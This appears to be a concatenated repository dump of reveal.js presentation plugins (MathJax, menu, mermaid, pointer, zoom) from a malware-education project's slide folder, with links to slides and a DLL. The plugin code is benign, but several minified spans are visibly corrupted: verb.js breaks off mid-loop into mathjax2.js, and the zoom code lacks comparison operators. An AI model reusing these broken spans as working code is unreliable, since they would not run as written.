i.CommandMap("unicode",{unicode:"Unicode"},e.UnicodeMethods),e.UnicodeConfiguration=n.Configuration.create("unicode",{handler:{macro:["unicode"]}})},955:function(t,e){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,e.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},992:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.options=MathJax._.util.Entities.options,e.entities=MathJax._.util.Entities.entities,e.add=MathJax._.util.Entities.add,e.remove=MathJax._.util.Entities.remove,e.translate=MathJax._.util.Entities.translate,e.numeric=MathJax._.util.Entities.numeric},251:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.Configuration=MathJax._.input.tex.Configuration.Configuration,e.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,e.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},748:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.NodeUtil.default},398:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.ParseUtil.default},871:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,e.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,e.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,e.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,e.DelimiterMap=MathJax._.inpu
t.tex.SymbolMap.DelimiterMap,e.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,e.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,e.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},402:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.TexError.default}},n={};function o(t){var e=n[t];if(void 0!==e)return e.exports;var i=n[t]={exports:{}};return a[t](i,i.exports,o),i.exports}t=o(955),e=o(376),(0,t.r8)({_:{input:{tex:{unicode:{UnicodeConfiguration:e}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/upgreek.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var a,t,p={927:function(a,t,p){Object.defineProperty(t,"__esModule",{value:!0}),t.UpgreekConfiguration=void 0;var e=p(251),n=p(871),o=p(108);new n.CharacterMap("upgreek",(function(a,t){var p=t.attributes||{};p.mathvariant=o.TexConstant.Variant.NORMAL;var 
e=a.create("token","mi",p,t.char);a.Push(e)}),{upalpha:"\u03b1",upbeta:"\u03b2",upgamma:"\u03b3",updelta:"\u03b4",upepsilon:"\u03f5",upzeta:"\u03b6",upeta:"\u03b7",uptheta:"\u03b8",upiota:"\u03b9",upkappa:"\u03ba",uplambda:"\u03bb",upmu:"\u03bc",upnu:"\u03bd",upxi:"\u03be",upomicron:"\u03bf",uppi:"\u03c0",uprho:"\u03c1",upsigma:"\u03c3",uptau:"\u03c4",upupsilon:"\u03c5",upphi:"\u03d5",upchi:"\u03c7",uppsi:"\u03c8",upomega:"\u03c9",upvarepsilon:"\u03b5",upvartheta:"\u03d1",upvarpi:"\u03d6",upvarrho:"\u03f1",upvarsigma:"\u03c2",upvarphi:"\u03c6",Upgamma:"\u0393",Updelta:"\u0394",Uptheta:"\u0398",Uplambda:"\u039b",Upxi:"\u039e",Uppi:"\u03a0",Upsigma:"\u03a3",Upupsilon:"\u03a5",Upphi:"\u03a6",Uppsi:"\u03a8",Upomega:"\u03a9"}),t.UpgreekConfiguration=e.Configuration.create("upgreek",{handler:{macro:["upgreek"]}})},955:function(a,t){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,t.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.Configuration=MathJax._.input.tex.Configuration.Configuration,t.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,t.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,t.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,t.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,t.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,t.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,t.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,t.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,t.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},108:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.TexConstant=MathJax._.input.tex.TexConstants.TexConstant}},
e={};function n(a){var t=e[a];if(void 0!==t)return t.exports;var o=e[a]={exports:{}};return p[a](o,o.exports,n),o.exports}a=n(955),t=n(927),(0,a.r8)({_:{input:{tex:{upgreek:{UpgreekConfiguration:t}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/verb.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,a,e={768:function(t,a,e){Object.defineProperty(a,"__esModule",{value:!0}),a.VerbConfiguration=a.VerbMethods=void 0;var n=e(251),o=e(108),r=e(871),i=e(402);a.VerbMethods={},a.VerbMethods.Verb=function(t,a){var e=t.GetNext(),n=++t.i;if(""===e)throw new i.default("MissingArgFor","Missing argument for %1",a);for(;t.i { 8 | 9 | // The reveal.js instance this plugin is attached to 10 | let deck; 11 | 12 | let defaultOptions = { 13 | messageStyle: 'none', 14 | tex2jax: { 15 | inlineMath: [ [ '$', '$' ], [ '\\(', '\\)' ] ], 16 | skipTags: [ 'script', 'noscript', 'style', 'textarea', 'pre' ] 17 | }, 18 | skipStartupTypeset: true 19 | }; 20 | 21 | function loadScript( url, callback ) { 22 | 23 | let head = document.querySelector( 'head' ); 24 | let script = document.createElement( 'script' ); 25 | script.type = 'text/javascript'; 26 | script.src = url; 27 | 28 | // Wrapper for callback to make sure it only fires once 29 | let finish = () => { 30 | if( typeof callback === 'function' ) { 31 | callback.call(); 32 | callback = null; 33 | } 34 | } 35 | 36 | script.onload = finish; 37 | 38 | // IE 39 | script.onreadystatechange = () => { 40 | if ( this.readyState === 'loaded' ) { 41 | finish(); 42 | } 43 | } 44 | 45 | // Normal browsers 46 | head.appendChild( script ); 47 | 48 | } 49 | 50 | return { 51 | id: 'mathjax2', 52 | 53 | init: function( reveal ) { 54 | 55 | deck = reveal; 56 | 57 | let revealOptions = deck.getConfig().mathjax2 || deck.getConfig().math || {}; 58 | 59 | let options = { ...defaultOptions, 
...revealOptions }; 60 | let mathjax = options.mathjax || 'https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js'; 61 | let config = options.config || 'TeX-AMS_HTML-full'; 62 | let url = mathjax + '?config=' + config; 63 | 64 | options.tex2jax = { ...defaultOptions.tex2jax, ...revealOptions.tex2jax }; 65 | 66 | options.mathjax = options.config = null; 67 | 68 | loadScript( url, function() { 69 | 70 | MathJax.Hub.Config( options ); 71 | 72 | // Typeset followed by an immediate reveal.js layout since 73 | // the typesetting process could affect slide height 74 | MathJax.Hub.Queue( [ 'Typeset', MathJax.Hub, deck.getRevealElement() ] ); 75 | MathJax.Hub.Queue( deck.layout ); 76 | 77 | // Reprocess equations in slides when they turn visible 78 | deck.on( 'slidechanged', function( event ) { 79 | 80 | MathJax.Hub.Queue( [ 'Typeset', MathJax.Hub, event.currentSlide ] ); 81 | 82 | } ); 83 | 84 | } ); 85 | 86 | } 87 | } 88 | 89 | }; 90 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax3.js: -------------------------------------------------------------------------------- 1 | /** 2 | * A plugin which enables rendering of math equations inside 3 | * of reveal.js slides. 
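Essentially a thin wrapper for MathJax 3
 *
 * @author Hakim El Hattab
 * @author Gerhard Burger
 */
export const MathJax3 = () => {

	// The reveal.js instance this plugin is attached to (set in init).
	// Everything below talks to this instance rather than to the global
	// `Reveal`, matching mathjax2.js, so the plugin also works when reveal.js
	// is consumed as an ES module or more than one deck lives in the page.
	let deck;

	let defaultOptions = {
		tex: {
			inlineMath: [ [ '$', '$' ], [ '\\(', '\\)' ] ]
		},
		options: {
			skipHtmlTags: [ 'script', 'noscript', 'style', 'textarea', 'pre' ]
		},
		startup: {
			// Runs once MathJax has loaded; re-layout afterwards because
			// typesetting can change slide height.
			ready: () => {
				MathJax.startup.defaultReady();
				MathJax.startup.promise.then(() => {
					deck.layout();
				});
			}
		}
	};

	/**
	 * Appends a <script> tag for `url` to <head>.
	 *
	 * @param {string}   url         script to load
	 * @param {Function} callback    invoked once, after the script has loaded
	 * @param {string}   [integrity] optional Subresource Integrity hash; when
	 *   given it is set together with crossorigin="anonymous", so the browser
	 *   refuses to run a CDN response whose bytes do not match the hash
	 */
	function loadScript( url, callback, integrity ) {

		let script = document.createElement( 'script' );
		script.type = 'text/javascript';
		script.id = 'MathJax-script';
		script.src = url;
		script.async = true;

		if( integrity ) {
			script.integrity = integrity;
			script.crossOrigin = 'anonymous';
		}

		// Wrapper for callback to make sure it only fires once
		script.onload = () => {
			if( typeof callback === 'function' ) {
				callback.call();
				callback = null;
			}
		};

		document.head.appendChild( script );

	}

	return {
		id: 'mathjax3',

		/**
		 * Merges the deck's `mathjax3` config over the defaults, publishes the
		 * result as window.MathJax and loads the MathJax bundle.
		 *
		 * Keys consumed here and not handed to MathJax:
		 *   mathjax   - URL of the bundle (default: jsDelivr, floating
		 *               "mathjax@3" tag)
		 *   integrity - optional SRI hash for that URL. Only useful with a
		 *               pinned exact-version URL: the content behind a floating
		 *               tag changes over time and would then fail the check.
		 *
		 * NOTE(review): the bundle URL is taken verbatim from the deck config,
		 * so whoever controls that config controls which script runs in the
		 * page, and the default fetches third-party code with no integrity
		 * check. Also, MathJax TeX macros such as \href, \class, \style and
		 * \cssId (the bundled html extension) copy their argument straight into
		 * output attributes; if slide content can come from untrusted authors,
		 * enable MathJax's URL/attribute filtering (the ui/safe extension in
		 * MathJax 3 - confirm against the version actually loaded).
		 *
		 * @param {Object} reveal  the reveal.js deck instance
		 */
		init: function( reveal ) {

			deck = reveal;

			let revealOptions = deck.getConfig().mathjax3 || {};
			let options = { ...defaultOptions, ...revealOptions };
			options.tex = { ...defaultOptions.tex, ...revealOptions.tex };
			options.options = { ...defaultOptions.options, ...revealOptions.options };
			options.startup = { ...defaultOptions.startup, ...revealOptions.startup };

			let url = options.mathjax || 'https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
			let integrity = options.integrity;
			options.mathjax = null;
			delete options.integrity;

			// MathJax reads its configuration from this global when it loads
			window.MathJax = options;

			loadScript( url, function() {
				// Reprocess equations in slides when they turn visible
				deck.on( 'slidechanged', function( event ) {
					MathJax.typeset();
				} );
			}, integrity );

		}
	}

};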
-------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/plugin.js: -------------------------------------------------------------------------------- 1 | import {KaTeX} from "./katex"; 2 | import {MathJax2} from "./mathjax2"; 3 | import {MathJax3} from "./mathjax3"; 4 | 5 | const defaultTypesetter = MathJax2; 6 | 7 | /*! 8 | * This plugin is a wrapper for the MathJax2, 9 | * MathJax3 and KaTeX typesetter plugins. 10 | */ 11 | export default Plugin = Object.assign( defaultTypesetter(), { 12 | KaTeX, 13 | MathJax2, 14 | MathJax3 15 | } ); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | ## Contributing 2 | 3 | ### Bug Reports 4 | When reporting a bug make sure to include information about which browser and operating system you are on as well as the necessary steps to reproduce the issue. If possible please include a link to a sample presentation where the bug can be tested. 
5 | 6 | ### Pull Requests 7 | - Should follow the coding style of the file you work in 8 | - Should be made towards the **dev branch** 9 | - Should be submitted from a feature/topic branch (not your master) 10 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (C) 2020 Greg Denehy 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy 4 | of this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights 6 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 7 | copies of the Software, and to permit persons to whom the Software is 8 | furnished to do so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in 11 | all copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 19 | THE SOFTWARE. 
-------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/bower.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "reveal.js-menu", 3 | "version": "2.1.0", 4 | "homepage": "https://denehyg.github.io/reveal.js-menu", 5 | "authors": ["Greg Denehy"], 6 | "description": "A slideout menu for navigating reveal.js presentations", 7 | "keywords": ["reveal", "menu"], 8 | "license": "MIT, Copyright (C) 2020 Greg Denehy", 9 | "ignore": ["**/.*", "node_modules", "bower_components", "test", "tests"] 10 | } 11 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/gulpfile.js: -------------------------------------------------------------------------------- 1 | const pkg = require('./package.json'); 2 | 3 | const { rollup } = require('rollup'); 4 | const { terser } = require('rollup-plugin-terser'); 5 | const babel = require('@rollup/plugin-babel').default; 6 | const commonjs = require('@rollup/plugin-commonjs'); 7 | const resolve = require('@rollup/plugin-node-resolve').default; 8 | 9 | const gulp = require('gulp'); 10 | 11 | const banner = `/*! 12 | * reveal.js-menu ${pkg.version} 13 | * ${pkg.homepage} 14 | * MIT licensed 15 | * 16 | * Copyright (C) 2016 Greg Denehy 17 | */\n`; 18 | 19 | const babelConfig = { 20 | babelHelpers: 'bundled', 21 | ignore: ['node_modules'], 22 | compact: false, 23 | extensions: ['.js', '.html'], 24 | plugins: ['transform-html-import-to-string'], 25 | presets: [ 26 | [ 27 | '@babel/preset-env', 28 | { 29 | corejs: 3, 30 | useBuiltIns: 'usage', 31 | modules: false 32 | } 33 | ] 34 | ] 35 | }; 36 | 37 | // Our ES module bundle only targets newer browsers with 38 | // module support. Browsers are targeted explicitly instead 39 | // of using the "esmodule: true" target since that leads to 40 | // polyfilling older browsers and a larger bundle. 
41 | const babelConfigESM = JSON.parse(JSON.stringify(babelConfig)); 42 | babelConfigESM.presets[0][1].targets = { 43 | browsers: [ 44 | 'last 2 Chrome versions', 45 | 'not Chrome < 60', 46 | 'last 2 Safari versions', 47 | 'not Safari < 10.1', 48 | 'last 2 iOS versions', 49 | 'not iOS < 10.3', 50 | 'last 2 Firefox versions', 51 | 'not Firefox < 60', 52 | 'last 2 Edge versions', 53 | 'not Edge < 16' 54 | ] 55 | }; 56 | 57 | let cache = {}; 58 | 59 | // Creates a UMD and ES module bundle for each plugin 60 | gulp.task('build', () => { 61 | return Promise.all( 62 | [ 63 | { 64 | name: 'RevealMenu', 65 | input: './plugin.js', 66 | output: './menu' 67 | } 68 | ].map(plugin => { 69 | return rollup({ 70 | cache: cache[plugin.input], 71 | input: plugin.input, 72 | plugins: [ 73 | resolve(), 74 | commonjs(), 75 | babel({ 76 | ...babelConfig, 77 | ignore: [/node_modules\/.*/] 78 | }), 79 | terser() 80 | ] 81 | }).then(bundle => { 82 | cache[plugin.input] = bundle.cache; 83 | bundle.write({ 84 | file: plugin.output + '.esm.js', 85 | name: plugin.name, 86 | format: 'es' 87 | }); 88 | 89 | bundle.write({ 90 | file: plugin.output + '.js', 91 | name: plugin.name, 92 | format: 'umd' 93 | }); 94 | }); 95 | }) 96 | ); 97 | }); 98 | 99 | gulp.task('default', gulp.series('build')); 100 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "reveal.js-menu", 3 | "version": "2.1.0", 4 | "description": "A slideout menu for navigating reveal.js presentations", 5 | "scripts": { 6 | "test": "echo \"Error: no test specified\" && exit 1", 7 | "build": "gulp" 8 | }, 9 | "repository": { 10 | "type": "git", 11 | "url": "git+https://github.com/denehyg/reveal.js-menu.git" 12 | }, 13 | "keywords": [ 14 | "reveal", 15 | "menu" 16 | ], 17 | "author": "Greg Denehy", 18 | "license": "MIT, Copyright (C) 2020 Greg Denehy", 19 | 
"bugs": { 20 | "url": "https://github.com/denehyg/reveal.js-menu/issues" 21 | }, 22 | "homepage": "https://github.com/denehyg/reveal.js-menu#readme", 23 | "devDependencies": { 24 | "@babel/core": "^7.10.4", 25 | "@babel/preset-env": "^7.10.4", 26 | "@rollup/plugin-babel": "^5.0.4", 27 | "@rollup/plugin-commonjs": "^13.0.0", 28 | "@rollup/plugin-node-resolve": "^8.1.0", 29 | "babel-plugin-transform-html-import-to-string": "0.0.1", 30 | "core-js": "^3.6.5", 31 | "gulp": "^4.0.2", 32 | "rollup": "^2.21.0", 33 | "rollup-plugin-terser": "^6.1.0" 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/mermaid/plugin.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * reveal.js Mermaid plugin 3 | */ 4 | 5 | import mermaid from "mermaid"; 6 | 7 | const Plugin = { 8 | id: "mermaid", 9 | 10 | init: function (reveal) { 11 | 12 | let { ...mermaidConfig } = reveal.getConfig().mermaid || {}; 13 | 14 | mermaid.mermaidAPI.initialize({ 15 | // The node size will be calculated incorrectly if set `startOnLoad: start`, 16 | // so we need to manually render. 
17 | startOnLoad: false, 18 | ...mermaidConfig, 19 | }); 20 | 21 | const mermaidEls = reveal.getRevealElement().querySelectorAll(".mermaid"); 22 | 23 | Array.from(mermaidEls).forEach(function (el) { 24 | var insertSvg = function (svgCode, bindFunctions) { 25 | el.innerHTML = svgCode; 26 | }; 27 | 28 | var graphDefinition = el.textContent.trim(); 29 | 30 | try { 31 | mermaid.mermaidAPI.render( 32 | `mermaid-${Math.random().toString(36).substring(2)}`, 33 | graphDefinition, 34 | insertSvg 35 | ); 36 | } catch (error) { 37 | let errorStr = ""; 38 | if (error?.str) { 39 | // From mermaid 9.1.4, error.message does not exists anymore 40 | errorStr = error.str; 41 | } 42 | if (error?.message) { 43 | errorStr = error.message; 44 | } 45 | console.error(errorStr, { error, graphDefinition, el }); 46 | el.innerHTML = errorStr; 47 | } 48 | }); 49 | }, 50 | }; 51 | 52 | export default () => Plugin; 53 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/reveal-pointer/pointer.css: -------------------------------------------------------------------------------- 1 | .cursor-dot,.cursor-dot-outline{pointer-events:none;position:absolute;top:0;left:0;border-radius:50%;opacity:0;transform:translate(-50%,-50%);transition:opacity 0.3s ease-in-out,transform 0.3s ease-in-out;}.cursor-dot{width:12px;height:12px;background-color:red;z-index:1;}.no-cursor{cursor:none;}.no-cursor a,.no-cursor div,.no-cursor span{cursor:none;} -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/reveal-pointer/pointer.js: -------------------------------------------------------------------------------- 1 | var RevealPointer=function(){"use strict";var 
e={backspace:8,tab:9,enter:13,shift:16,ctrl:17,alt:18,pausebreak:19,capslock:20,esc:27,space:32,pageup:33,pagedown:34,end:35,home:36,leftarrow:37,uparrow:38,rightarrow:39,downarrow:40,insert:45,delete:46,0:48,1:49,2:50,3:51,4:52,5:53,6:54,7:55,8:56,9:57,a:65,b:66,c:67,d:68,e:69,f:70,g:71,h:72,i:73,j:74,k:75,l:76,m:77,n:78,o:79,p:80,q:81,r:82,s:83,t:84,u:85,v:86,w:87,x:88,y:89,z:90,leftwindowkey:91,rightwindowkey:92,selectkey:93,numpad0:96,numpad1:97,numpad2:98,numpad3:99,numpad4:100,numpad5:101,numpad6:102,numpad7:103,numpad8:104,numpad9:105,multiply:106,add:107,subtract:109,decimalpoint:110,divide:111,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123,numlock:144,scrolllock:145,semicolon:186,equalsign:187,comma:188,dash:189,period:190,forwardslash:191,graveaccent:192,openbracket:219,backslash:220,closebracket:221,singlequote:222};return function(){var t={},o=!1,n=null,a={x:0,y:0,isVisible:!1},i={x:0,y:0,scale:1};function l(o){var n;null==(t=o.pointer||{}).key?t.key="q":t.key=t.key.toLowerCase(),null!=t.pointerSize&&"number"==typeof t.pointerSize||(t.pointerSize=12),null!=t.tailLength&&"number"==typeof t.tailLength||(t.tailLength=10),null!=t.color&&"string"==typeof t.color||(t.color="red"),null!=t.alwaysVisible&&"boolean"==typeof t.alwaysVisible||(t.alwaysVisible=!1),null!=t.opacity&&"number"==typeof t.opacity||(t.opacity=.8),t.keyCode=(n=t.key,e[n])}function r(){n.style.top="".concat((a.y-i.y)/i.scale,"px"),n.style.left="".concat((a.x-i.x)/i.scale,"px"),a.isVisible?n.style.opacity=t.opacity.toString():n.style.opacity="0",1!==i.scale?(n.style.width="".concat(t.pointerSize/i.scale,"px"),n.style.height="".concat(t.pointerSize/i.scale,"px")):(n.style.width="".concat(t.pointerSize,"px"),n.style.height="".concat(t.pointerSize,"px"))}function c(e){a.x=e.pageX,a.y=e.pageY;var 
t=document.body.style.transform;""!==t?(i.x=Number.parseInt(/translate\((.*)px,/gm.exec(t)[1]),i.y=Number.parseInt(/px,\s(.*)px\)/gm.exec(t)[1]),i.scale=Number.parseFloat(/scale\((.)\)/gm.exec(t)[1])):(i.x=0,i.y=0,i.scale=1),requestAnimationFrame(r)}function s(){(o=!o)?(document.addEventListener("mousemove",c),document.body.classList.add("no-cursor"),a.isVisible=!0):(document.removeEventListener("mousemove",c),document.body.classList.remove("no-cursor"),a.isVisible=!1,requestAnimationFrame(r))}return{id:"pointer",init:function(e){var o;l(e.getConfig()),t.alwaysVisible?s():e.addKeyBinding({keyCode:t.keyCode,key:t.key},(function(){s()})),e.on("pointerColorChange",(function(e){var o;o=e.color,null!=n&&(n.style.backgroundColor=null!=o?o:t.color)})),(o=document.createElement("div")).className="cursor-dot",o.style.width="".concat(t.pointerSize,"px"),o.style.height="".concat(t.pointerSize,"px"),o.style.backgroundColor=t.color,t.alwaysVisible&&(o.style.opacity="0.8"),document.body.appendChild(o),n=o}}}}(); 2 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/zoom/zoom.esm.js: -------------------------------------------------------------------------------- 1 | /*! 
2 | * reveal.js Zoom plugin 3 | */ 4 | var e={id:"zoom",init:function(e){e.getRevealElement().addEventListener("mousedown",(function(n){var o=/Linux/.test(window.navigator.platform)?"ctrl":"alt",i=(e.getConfig().zoomKey?e.getConfig().zoomKey:o)+"Key",d=e.getConfig().zoomLevel?e.getConfig().zoomLevel:2;n[i]&&!e.isOverview()&&(n.preventDefault(),t.to({x:n.clientX,y:n.clientY,scale:d,pan:!1}))}))},destroy:function(){t.reset()}},t=function(){var e=1,n=0,o=0,i=-1,d=-1,l="transform"in document.body.style;function s(t,n){var o=r();if(t.width=t.width||1,t.height=t.height||1,t.x-=(window.innerWidth-t.width*n)/2,t.y-=(window.innerHeight-t.height*n)/2,l)if(1===n)document.body.style.transform="";else{var i=o.x+"px "+o.y+"px",d="translate("+-t.x+"px,"+-t.y+"px) scale("+n+")";document.body.style.transformOrigin=i,document.body.style.transform=d}else 1===n?(document.body.style.position="",document.body.style.left="",document.body.style.top="",document.body.style.width="",document.body.style.height="",document.body.style.zoom=""):(document.body.style.position="relative",document.body.style.left=-(o.x+t.x)/n+"px",document.body.style.top=-(o.y+t.y)/n+"px",document.body.style.width=100*n+"%",document.body.style.height=100*n+"%",document.body.style.zoom=n);e=n,document.documentElement.classList&&(1!==e?document.documentElement.classList.add("zoomed"):document.documentElement.classList.remove("zoomed"))}function c(){var t=.12*window.innerWidth,i=.12*window.innerHeight,d=r();owindow.innerHeight-i&&window.scroll(d.x,d.y+(1-(window.innerHeight-o)/i)*(14/e)),nwindow.innerWidth-t&&window.scroll(d.x+(1-(window.innerWidth-n)/t)*(14/e),d.y)}function r(){return{x:void 0!==window.scrollX?window.scrollX:window.pageXOffset,y:void 0!==window.scrollY?window.scrollY:window.pageYOffset}}return l&&(document.body.style.transition="transform 0.8s 
ease"),document.addEventListener("keyup",(function(n){1!==e&&27===n.keyCode&&t.out()})),document.addEventListener("mousemove",(function(t){1!==e&&(n=t.clientX,o=t.clientY)})),{to:function(n){if(1!==e)t.out();else{if(n.x=n.x||0,n.y=n.y||0,n.element){var o=n.element.getBoundingClientRect();n.x=o.left-20,n.y=o.top-20,n.width=o.width+40,n.height=o.height+40}void 0!==n.width&&void 0!==n.height&&(n.scale=Math.max(Math.min(window.innerWidth/n.width,window.innerHeight/n.height),1)),n.scale>1&&(n.x*=n.scale,n.y*=n.scale,s(n,n.scale),!1!==n.pan&&(i=setTimeout((function(){d=setInterval(c,1e3/60)}),800)))}},out:function(){clearTimeout(i),clearInterval(d),s({x:0,y:0},1),e=1},magnify:function(e){this.to(e)},reset:function(){this.out()},zoomLevel:function(){return e}}}();export default function(){return e} 5 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/zoom/zoom.js: -------------------------------------------------------------------------------- 1 | !function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).RevealZoom=t()}(this,(function(){"use strict"; 2 | /*! 
3 | * reveal.js Zoom plugin 4 | */var e={id:"zoom",init:function(e){e.getRevealElement().addEventListener("mousedown",(function(o){var n=/Linux/.test(window.navigator.platform)?"ctrl":"alt",i=(e.getConfig().zoomKey?e.getConfig().zoomKey:n)+"Key",d=e.getConfig().zoomLevel?e.getConfig().zoomLevel:2;o[i]&&!e.isOverview()&&(o.preventDefault(),t.to({x:o.clientX,y:o.clientY,scale:d,pan:!1}))}))},destroy:function(){t.reset()}},t=function(){var e=1,o=0,n=0,i=-1,d=-1,l="transform"in document.body.style;function s(t,o){var n=r();if(t.width=t.width||1,t.height=t.height||1,t.x-=(window.innerWidth-t.width*o)/2,t.y-=(window.innerHeight-t.height*o)/2,l)if(1===o)document.body.style.transform="";else{var i=n.x+"px "+n.y+"px",d="translate("+-t.x+"px,"+-t.y+"px) scale("+o+")";document.body.style.transformOrigin=i,document.body.style.transform=d}else 1===o?(document.body.style.position="",document.body.style.left="",document.body.style.top="",document.body.style.width="",document.body.style.height="",document.body.style.zoom=""):(document.body.style.position="relative",document.body.style.left=-(n.x+t.x)/o+"px",document.body.style.top=-(n.y+t.y)/o+"px",document.body.style.width=100*o+"%",document.body.style.height=100*o+"%",document.body.style.zoom=o);e=o,document.documentElement.classList&&(1!==e?document.documentElement.classList.add("zoomed"):document.documentElement.classList.remove("zoomed"))}function c(){var t=.12*window.innerWidth,i=.12*window.innerHeight,d=r();nwindow.innerHeight-i&&window.scroll(d.x,d.y+(1-(window.innerHeight-n)/i)*(14/e)),owindow.innerWidth-t&&window.scroll(d.x+(1-(window.innerWidth-o)/t)*(14/e),d.y)}function r(){return{x:void 0!==window.scrollX?window.scrollX:window.pageXOffset,y:void 0!==window.scrollY?window.scrollY:window.pageYOffset}}return l&&(document.body.style.transition="transform 0.8s 
ease"),document.addEventListener("keyup",(function(o){1!==e&&27===o.keyCode&&t.out()})),document.addEventListener("mousemove",(function(t){1!==e&&(o=t.clientX,n=t.clientY)})),{to:function(o){if(1!==e)t.out();else{if(o.x=o.x||0,o.y=o.y||0,o.element){var n=o.element.getBoundingClientRect();o.x=n.left-20,o.y=n.top-20,o.width=n.width+40,o.height=n.height+40}void 0!==o.width&&void 0!==o.height&&(o.scale=Math.max(Math.min(window.innerWidth/o.width,window.innerHeight/o.height),1)),o.scale>1&&(o.x*=o.scale,o.y*=o.scale,s(o,o.scale),!1!==o.pan&&(i=setTimeout((function(){d=setInterval(c,1e3/60)}),800)))}},out:function(){clearTimeout(i),clearInterval(d),s({x:0,y:0},1),e=1},magnify:function(e){this.to(e)},reset:function(){this.out()},zoomLevel:function(){return e}}}();return function(){return e}})); 5 | -------------------------------------------------------------------------------- /videos/malware-roadmap/slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/slides.pdf -------------------------------------------------------------------------------- /videos/pe-deepdive/README.md: -------------------------------------------------------------------------------- 1 | - [video](https://www.youtube.com/watch?v=WIdkwzKV6Zk) 2 | - [pe diagram](https://raw.githubusercontent.com/corkami/pics/master/binary/pe101/pe101-64.png) 3 | - [MessageBox](https://learn.microsoft.com/en-us/dotnet/api/system.windows.forms.messagebox?view=windowsdesktop-7.0) 4 | -------------------------------------------------------------------------------- /videos/pe-deepdive/cosmo.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/pe-deepdive/cosmo.dll 
